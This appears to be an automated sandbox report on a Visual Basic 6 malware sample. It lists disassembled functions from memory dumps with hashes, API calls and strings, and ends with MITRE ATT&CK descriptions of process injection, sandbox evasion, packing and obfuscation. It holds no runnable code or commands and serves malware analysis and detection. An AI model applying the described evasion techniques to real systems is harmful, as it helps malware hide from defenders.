Opcode ID: 16e6b38a3e0f53d920534dae6486f45de0828a9d9cb27171ed847b5501bca186
Instruction ID: 3a89bb8368987738882d265b31ddd71bf7ff46d699062785cc9e814e6f39326b
Opcode Fuzzy Hash: 16e6b38a3e0f53d920534dae6486f45de0828a9d9cb27171ed847b5501bca186
Instruction Fuzzy Hash: 2F71E0B16043489FDF369E34CCA6BEA3BA6EF14300F55412EDD89CB251D3718D968B42

Uniqueness

Uniqueness Score: -1.00%

Function 003C6505, Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

<{2, xrefs: 003C653E

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: <{2
API String ID: 0-580566395
Opcode ID: 4ad143aaadd864551491c447f23b9f00e61d1c6779acab6c447fe8e25fa1b453
Instruction ID: 9f39541cd6471002fe1b2f2426902e41ad8f37091b9f33728ed457ac11a71541
Opcode Fuzzy Hash: 4ad143aaadd864551491c447f23b9f00e61d1c6779acab6c447fe8e25fa1b453
Instruction Fuzzy Hash: 1D51E0B16043489FDF3A9E24CDAABEA3BA6EF54340F54412DED8DCB200D7319D568B42

Uniqueness

Uniqueness Score: -1.00%

Function 003C35E0, Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04559f9dccd2687f2aba100133aa8ed86fa5994a900c5a8395a17b757f909b54
Instruction ID: 1ba27f18743ba576ed4f9ef34d48e405c4fb28e3e5a40d56d4616a22ddc61efa
Opcode Fuzzy Hash: 04559f9dccd2687f2aba100133aa8ed86fa5994a900c5a8395a17b757f909b54
Instruction Fuzzy Hash: DBA125B160434ADFDB34DE38C9947EF77A6AF98390F95812DDC8ADB614D3314A818B41

Uniqueness

Uniqueness Score: -1.00%

Function 003C36DA, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c848236a40850a711df745bff7c0b43468922c7b09f0d1f927f18d62b8bea503
Instruction ID: 49ed8ad196315cf2177e305b9b27566fe521e6a055014453d258f2e61ba39035
Opcode Fuzzy Hash: c848236a40850a711df745bff7c0b43468922c7b09f0d1f927f18d62b8bea503
Instruction Fuzzy Hash: 968134B160438A9FDB34DE39C9917EF77A6EF98380F55812DDC8AD7614D3318A818742

Uniqueness

Uniqueness Score: -1.00%

Function 003C3647, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6db37754d21b96c1f7fb657871e427d358c1bd9bc4219fd371ba7c9a9d7481
Instruction ID: 15dd5a36cab7d2c1c3398df9173b71d23d55bb88cadd10e50e6a363b4c1d906b
Opcode Fuzzy Hash: ff6db37754d21b96c1f7fb657871e427d358c1bd9bc4219fd371ba7c9a9d7481
Instruction Fuzzy Hash: 5681147160438A9FCB34DE38C9917EF7BA6EF98780F55812DDC8AD7614D3314A818B42

Uniqueness

Uniqueness Score: -1.00%

Function 003C4DD8, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564d9a909158bdc23f11e5f23e8c98c706cce24b867315bacfb4461f74ed136f
Instruction ID: 1cab2db698a6ab9efdecfd94db5c144807822965005e3d0ae5def0e6128bb936
Opcode Fuzzy Hash: 564d9a909158bdc23f11e5f23e8c98c706cce24b867315bacfb4461f74ed136f
Instruction Fuzzy Hash: B77124B6A04345DFDF359EA8C988BD977A5EF1A350F9A412EDC49CB201D3748D818F41

Uniqueness

Uniqueness Score: -1.00%

Function 003C28C3, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f490b2453d705928cd4555f2724265a7d8f02a38054848696ceaca3a3e246a55
Instruction ID: 8e139834041871cc822de8b396ef1ab2d594fad00a5fede92011d39cf4def1f2
Opcode Fuzzy Hash: f490b2453d705928cd4555f2724265a7d8f02a38054848696ceaca3a3e246a55
Instruction Fuzzy Hash: 72614272A04659CFCB359E248C64BDF77A6EFA9380F14412EEC8AEB250D3314E828751

Uniqueness

Uniqueness Score: -1.00%

Function 003C28FA, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe203a8a28491ff52070a7b15822a056135799311af338a9773b99de2877f8a
Instruction ID: 5e68b21af2709fc3eab81089ccd977a2f48f7c7e419578e6f4cdc5b86bf32bed
Opcode Fuzzy Hash: 0fe203a8a28491ff52070a7b15822a056135799311af338a9773b99de2877f8a
Instruction Fuzzy Hash: CE5122B2A003998FCB759E288C54BCB37A6EFA9750F04412EEC49AB340D3318E429791

Uniqueness

Uniqueness Score: -1.00%

Function 003C37A2, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7ac5bf53ca6f543b5da4cd2521d335fc5ad79ccbe0a068543b53e138861baba
Instruction ID: 2e3775f8c9da486430300ba147597688fc271a1c83057967a3046fd1af96e146
Opcode Fuzzy Hash: c7ac5bf53ca6f543b5da4cd2521d335fc5ad79ccbe0a068543b53e138861baba
Instruction Fuzzy Hash: AF5101B120438ADFCB349E29CD91BEF7BA6AF95790F95812DDC89DB604D3304A468701

Uniqueness

Uniqueness Score: -1.00%

Function 003C378B, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24776bdee6d67d889a4940908cf16c8192904bc3e3f43fa8bcad00fba09fe79c
Instruction ID: 6bf32655bcaf858c0585dd611694b44e2bcd53c6d7adec04efed3f6abd91762a
Opcode Fuzzy Hash: 24776bdee6d67d889a4940908cf16c8192904bc3e3f43fa8bcad00fba09fe79c
Instruction Fuzzy Hash: 8951237160438ADFCB349E28CD917EF7BA6EF95790F95812DDC8997604D3304A468B02

Uniqueness

Uniqueness Score: -1.00%

Function 003C297D, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9116f7e43043092098f582f5f4ec4ae39fd69d9afbe5808eece5f29be66ca96
Instruction ID: a6be90e36d2a448a72bf2270bd8410dff3409d52fae5ec4a3656967fcd8c6dd8
Opcode Fuzzy Hash: b9116f7e43043092098f582f5f4ec4ae39fd69d9afbe5808eece5f29be66ca96
Instruction Fuzzy Hash: DB512371A0434A8FCB358E28CC55BCA7BB6FFA5750F14412DEC899B251D7328A128B80

Uniqueness

Uniqueness Score: -1.00%

Function 003C3819, Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b524d94d3182c9381b7896b006900cc0380c78f636d354c9975a3a66c412d6d4
Instruction ID: c1d735e40d42c985c88a5051b5d01d3fe5169c78d49a2e9985c7072b541af7d5
Opcode Fuzzy Hash: b524d94d3182c9381b7896b006900cc0380c78f636d354c9975a3a66c412d6d4
Instruction Fuzzy Hash: F3511671604386DFCB349E29C9917EF7BA6EF94780F95812EDC8AD7604D3718E468702

Uniqueness

Uniqueness Score: -1.00%

Function 003C30B1, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5badb8a8abfd5550a0a24cd867ee5593f91c61b292b01f42527506581c65d99b
Instruction ID: 4b7747632e4ca4830a1b157eec44df3452ebb1b79ea37062cfb6756b34fb3dd0
Opcode Fuzzy Hash: 5badb8a8abfd5550a0a24cd867ee5593f91c61b292b01f42527506581c65d99b
Instruction Fuzzy Hash: D8511A71B043468FDB31AE24CD55BDA77A3AFA5340F95812DDC8DCB618E7318E828741

Uniqueness

Uniqueness Score: -1.00%

Function 003C6E33, Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2823eec52b2d510b4dd62cacb447a9fa6a60426b8a9a1769e4ac22a6fc6be672
Instruction ID: d091bd701e38b5b70efa920894ba32dd055b97318563e917ebb970c97afbecdc
Opcode Fuzzy Hash: 2823eec52b2d510b4dd62cacb447a9fa6a60426b8a9a1769e4ac22a6fc6be672
Instruction Fuzzy Hash: CD413775A04346DFDF35AEE99C887DE33A5AF19360F97402FAC89CB501C33449868B42

Uniqueness

Uniqueness Score: -1.00%

Function 003C38CD, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d2df91e6ed73fe17a0ab6396bc994d941214de33be7441731b7efc02a7d878
Instruction ID: d817f3accdd63cbfe00505df0cd1393473e6f571b0b1412f72110faa9a9a8424
Opcode Fuzzy Hash: e3d2df91e6ed73fe17a0ab6396bc994d941214de33be7441731b7efc02a7d878
Instruction Fuzzy Hash: D941337160434A9FDB348E3889917EF3BA69FA4790F55822EDC8AD7540D3318E468702

Uniqueness

Uniqueness Score: -1.00%

Function 003C339B, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 52b636303631dd41de4049da76c4b10b4f458517b2ea8b0c009e9e3a4f6a09ea
Instruction ID: 9269692c4bead30c74b159c7b164875109278d1c05ec57629f0d83ff753f25db
Opcode Fuzzy Hash: 52b636303631dd41de4049da76c4b10b4f458517b2ea8b0c009e9e3a4f6a09ea
Instruction Fuzzy Hash: F2312BB560038A9BDB75AF35CC95BDB367AAF85350F91802DEC99DB214CB344F818B12

Uniqueness

Uniqueness Score: -1.00%

Function 003C4CA5, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3880518b36f0364310fca81f873c333bd0c11fdda156803d7637d71f54f0658d
Instruction ID: ec2b5f954aa79a74c127667d14332806d629ed5c9f1d24974c6f37596b52824a
Opcode Fuzzy Hash: 3880518b36f0364310fca81f873c333bd0c11fdda156803d7637d71f54f0658d
Instruction Fuzzy Hash: C5110632A18324DFCB646FBA88257EAB7E0BF55340F46042DDCC6A7505D3701D80DB96

Uniqueness

Uniqueness Score: -1.00%

Function 003C9F3C, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cbda1d440bb7f6ad49d783d0d6c3c0793f5733edf2018c9292136fe89612c5d
Instruction ID: 681de9d249d84a801cb8829d79a64dfa2bc9ce638cf38b80a005439ce69afbb2
Opcode Fuzzy Hash: 8cbda1d440bb7f6ad49d783d0d6c3c0793f5733edf2018c9292136fe89612c5d
Instruction Fuzzy Hash: BFC080839180A50A1B761574251D755150645C161435B49397414DDD0DD4D58D454153

Uniqueness

Uniqueness Score: -1.00%

Function 003C6C03, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 003C9282, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFA0, Relevance: 142.1, APIs: 80, Strings: 1, Instructions: 351COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041AFEF
__vbaAryConstruct2.MSVBVM60(?,00402C58,00000011), ref: 0041B000
__vbaVarDup.MSVBVM60 ref: 0041B01A
#558.MSVBVM60(?), ref: 0041B024
__vbaFreeVar.MSVBVM60 ref: 0041B03B
__vbaOnError.MSVBVM60(00000000), ref: 0041B04B
__vbaUI1I2.MSVBVM60 ref: 0041B05C
__vbaUI1I2.MSVBVM60 ref: 0041B068
__vbaUI1I2.MSVBVM60 ref: 0041B075
__vbaUI1I2.MSVBVM60 ref: 0041B082
__vbaUI1I2.MSVBVM60 ref: 0041B08F
__vbaUI1I2.MSVBVM60 ref: 0041B09C
__vbaUI1I2.MSVBVM60 ref: 0041B0A9
__vbaUI1I2.MSVBVM60 ref: 0041B0B6
__vbaUI1I2.MSVBVM60 ref: 0041B0C3
__vbaUI1I2.MSVBVM60 ref: 0041B0D0
__vbaUI1I2.MSVBVM60 ref: 0041B0DD
__vbaUI1I2.MSVBVM60 ref: 0041B0EA
__vbaUI1I2.MSVBVM60 ref: 0041B0F7
__vbaUI1I2.MSVBVM60 ref: 0041B104
__vbaUI1I2.MSVBVM60 ref: 0041B111
__vbaUI1I2.MSVBVM60 ref: 0041B11E
__vbaUI1I2.MSVBVM60 ref: 0041B12B
__vbaUI1I2.MSVBVM60 ref: 0041B138
__vbaUI1I2.MSVBVM60 ref: 0041B145
__vbaUI1I2.MSVBVM60 ref: 0041B152
__vbaUI1I2.MSVBVM60 ref: 0041B15F
__vbaUI1I2.MSVBVM60 ref: 0041B16C
__vbaUI1I2.MSVBVM60 ref: 0041B179
__vbaUI1I2.MSVBVM60 ref: 0041B186
__vbaUI1I2.MSVBVM60 ref: 0041B193
__vbaUI1I2.MSVBVM60 ref: 0041B1A0
__vbaUI1I2.MSVBVM60 ref: 0041B1AD
__vbaUI1I2.MSVBVM60 ref: 0041B1BA
__vbaUI1I2.MSVBVM60 ref: 0041B1C7
__vbaUI1I2.MSVBVM60 ref: 0041B1D4
__vbaUI1I2.MSVBVM60 ref: 0041B1E1
__vbaUI1I2.MSVBVM60 ref: 0041B1EE
__vbaUI1I2.MSVBVM60 ref: 0041B1FB
__vbaUI1I2.MSVBVM60 ref: 0041B208
__vbaUI1I2.MSVBVM60 ref: 0041B215
__vbaUI1I2.MSVBVM60 ref: 0041B222
__vbaUI1I2.MSVBVM60 ref: 0041B22F
__vbaUI1I2.MSVBVM60 ref: 0041B23C
__vbaUI1I2.MSVBVM60 ref: 0041B249
__vbaUI1I2.MSVBVM60 ref: 0041B256
__vbaUI1I2.MSVBVM60 ref: 0041B263
__vbaUI1I2.MSVBVM60 ref: 0041B270
__vbaUI1I2.MSVBVM60 ref: 0041B27D
__vbaUI1I2.MSVBVM60 ref: 0041B28A
__vbaUI1I2.MSVBVM60 ref: 0041B297
__vbaUI1I2.MSVBVM60 ref: 0041B2A4
__vbaUI1I2.MSVBVM60 ref: 0041B2B1
__vbaUI1I2.MSVBVM60 ref: 0041B2BE
__vbaUI1I2.MSVBVM60 ref: 0041B2CB
__vbaUI1I2.MSVBVM60 ref: 0041B2D8
__vbaUI1I2.MSVBVM60 ref: 0041B2E5
__vbaUI1I2.MSVBVM60 ref: 0041B2F2
__vbaUI1I2.MSVBVM60 ref: 0041B2FF
__vbaUI1I2.MSVBVM60 ref: 0041B30C
__vbaUI1I2.MSVBVM60 ref: 0041B319
__vbaUI1I2.MSVBVM60 ref: 0041B326
__vbaUI1I2.MSVBVM60 ref: 0041B333
__vbaUI1I2.MSVBVM60 ref: 0041B340
__vbaUI1I2.MSVBVM60 ref: 0041B34D
__vbaUI1I2.MSVBVM60 ref: 0041B35A
__vbaUI1I2.MSVBVM60 ref: 0041B367
__vbaUI1I2.MSVBVM60 ref: 0041B374
__vbaUI1I2.MSVBVM60 ref: 0041B381
__vbaUI1I2.MSVBVM60 ref: 0041B38E
__vbaUI1I2.MSVBVM60 ref: 0041B39B
__vbaUI1I2.MSVBVM60 ref: 0041B3A8
__vbaUI1I2.MSVBVM60 ref: 0041B3B5
__vbaUI1I2.MSVBVM60 ref: 0041B3C2
__vbaUI1I2.MSVBVM60 ref: 0041B3CF
__vbaUI1I2.MSVBVM60 ref: 0041B3DC
__vbaUI1I2.MSVBVM60 ref: 0041B3E9
__vbaEnd.MSVBVM60 ref: 0041B3F1
__vbaAryDestruct.MSVBVM60(00000000,?,0041B42B), ref: 0041B41B
__vbaFreeStr.MSVBVM60 ref: 0041B424

Strings

enakteres, xrefs: 0041B006

Memory Dump Source

Source File: 00000006.00000002.711109290.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.711100996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.711126197.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.711146971.000000000041E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#558Construct2CopyDestructError
String ID: enakteres
API String ID: 3426752192-4231501920
Opcode ID: c1afee418234bd96d636fc8f2011d3dd1acecbb6e29e5ce653ee4dcac4020445
Instruction ID: 796961dea898a632980d2c422029438da6254bd59c91824008558a3345be5a19
Opcode Fuzzy Hash: c1afee418234bd96d636fc8f2011d3dd1acecbb6e29e5ce653ee4dcac4020445
Instruction Fuzzy Hash: F9E13835A051988FD709DBE8C5506ECBFF6AFAD200F24419FC54167383CA669E46CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0041B460, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041B4B7
#618.MSVBVM60(?,00000001), ref: 0041B4C3
__vbaStrMove.MSVBVM60 ref: 0041B4CE
__vbaStrCmp.MSVBVM60(00402C80,00000000), ref: 0041B4DA
__vbaFreeStr.MSVBVM60 ref: 0041B4ED
__vbaNew2.MSVBVM60(004029C4,0041C3C8), ref: 0041B50E
__vbaHresultCheckObj.MSVBVM60(00000000,0261F8CC,004029B4,00000014), ref: 0041B539
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D4,00000138), ref: 0041B56A
__vbaFreeObj.MSVBVM60 ref: 0041B56F
__vbaNew2.MSVBVM60(004029C4,0041C3C8), ref: 0041B587
__vbaHresultCheckObj.MSVBVM60(00000000,0261F8CC,004029B4,00000014), ref: 0041B5AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004029D4,00000068), ref: 0041B5CC
__vbaFreeObj.MSVBVM60 ref: 0041B5D1
__vbaVarDup.MSVBVM60 ref: 0041B5EB
#600.MSVBVM60(?,00000002), ref: 0041B5F7
__vbaFreeVar.MSVBVM60 ref: 0041B602
__vbaFreeStr.MSVBVM60(0041B644), ref: 0041B63D

Strings

Hyperhilariously, xrefs: 0041B5DD
Kalkgravs, xrefs: 0041B54A
var, xrefs: 0041B497

Memory Dump Source

Source File: 00000006.00000002.711109290.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.711100996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.711126197.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.711146971.000000000041E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#600#618CopyMove
String ID: Hyperhilariously$Kalkgravs$var
API String ID: 1542644099-1014535997
Opcode ID: 09e3348ee89f284f701ad00c14ec6acb2e2e432b7c5caa7511a38b10a72adeec
Instruction ID: dae45477952763547178e6bf067a05069b10528b854f707ea366a53be2c9d766
Opcode Fuzzy Hash: 09e3348ee89f284f701ad00c14ec6acb2e2e432b7c5caa7511a38b10a72adeec
Instruction Fuzzy Hash: 05516EB1941208ABCB04DF94DE89EDDBBB5FB08704F20412AF541B72A0D7745A85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00418D30, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00418D85
#714.MSVBVM60(?,?,00000000), ref: 00418DA9
__vbaVarTstNe.MSVBVM60(?,?), ref: 00418DC5
__vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 00418DDB
#648.MSVBVM60(00000005), ref: 00418DFB
__vbaFreeVar.MSVBVM60 ref: 00418E0A
#536.MSVBVM60(0000000A), ref: 00418E16
__vbaStrMove.MSVBVM60 ref: 00418E21
__vbaFreeVar.MSVBVM60 ref: 00418E2A
#532.MSVBVM60(AWKWARDNESS), ref: 00418E31
#536.MSVBVM60(00000005), ref: 00418E49
__vbaStrMove.MSVBVM60 ref: 00418E54
__vbaFreeVar.MSVBVM60 ref: 00418E5D
__vbaFreeStr.MSVBVM60(00418E9C), ref: 00418E8F
__vbaFreeStr.MSVBVM60 ref: 00418E94
__vbaFreeStr.MSVBVM60 ref: 00418E99

Strings

AWKWARDNESS, xrefs: 00418E2C

Memory Dump Source

Source File: 00000006.00000002.711109290.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.711100996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.711126197.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.711146971.000000000041E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536Move$#532#648#714CopyList
String ID: AWKWARDNESS
API String ID: 1150874924-1149946547
Opcode ID: 8ec8db2521248e0ef372bec94bb03353a32c65fc41b050573f765aa024e09ea2
Instruction ID: a0a0407525f051efb525ce45dacd41f752fcd9aaf7e05bda08353611efae079a
Opcode Fuzzy Hash: 8ec8db2521248e0ef372bec94bb03353a32c65fc41b050573f765aa024e09ea2
Instruction Fuzzy Hash: 5E41B5B1C10259EBCB04DFA4E9889DDBFB8FF48705F10412AE906B3260DB741989CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041B680, Relevance: 16.6, APIs: 11, Instructions: 97COMMON

Download Yara Rule

APIs

#632.MSVBVM60(?,?,00000000,?), ref: 0041B6F2
__vbaStrVarVal.MSVBVM60(?,?), ref: 0041B700
#516.MSVBVM60(00000000), ref: 0041B707
__vbaFreeStr.MSVBVM60 ref: 0041B71D
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041B72D
#617.MSVBVM60(00000002,?,000000FF), ref: 0041B74E
#617.MSVBVM60(00000002,?,00000000), ref: 0041B76C
__vbaStrVarMove.MSVBVM60(00000002), ref: 0041B776
__vbaStrMove.MSVBVM60 ref: 0041B781
__vbaFreeVar.MSVBVM60 ref: 0041B78A
__vbaFreeStr.MSVBVM60(0041B7BE), ref: 0041B7B7

Memory Dump Source

Source File: 00000006.00000002.711109290.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.711100996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.711126197.000000000041C000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.711146971.000000000041E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#617Move$#516#632List
String ID:
API String ID: 3155365896-0
Opcode ID: 37f9366ce7d1b0bf639339ed4289c1c821e8b2481a55b571b748ee88b3cc2edf
Instruction ID: 6a7f45cd2f59a973ba2156d932e65de4f63e70a004e41748febc708dcff8a53f
Opcode Fuzzy Hash: 37f9366ce7d1b0bf639339ed4289c1c821e8b2481a55b571b748ee88b3cc2edf
Instruction Fuzzy Hash: 6541FBB1C01249EBCB14DFE5DA849DEFBB8EF98704F20811AE512B7264D7785A09CF94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
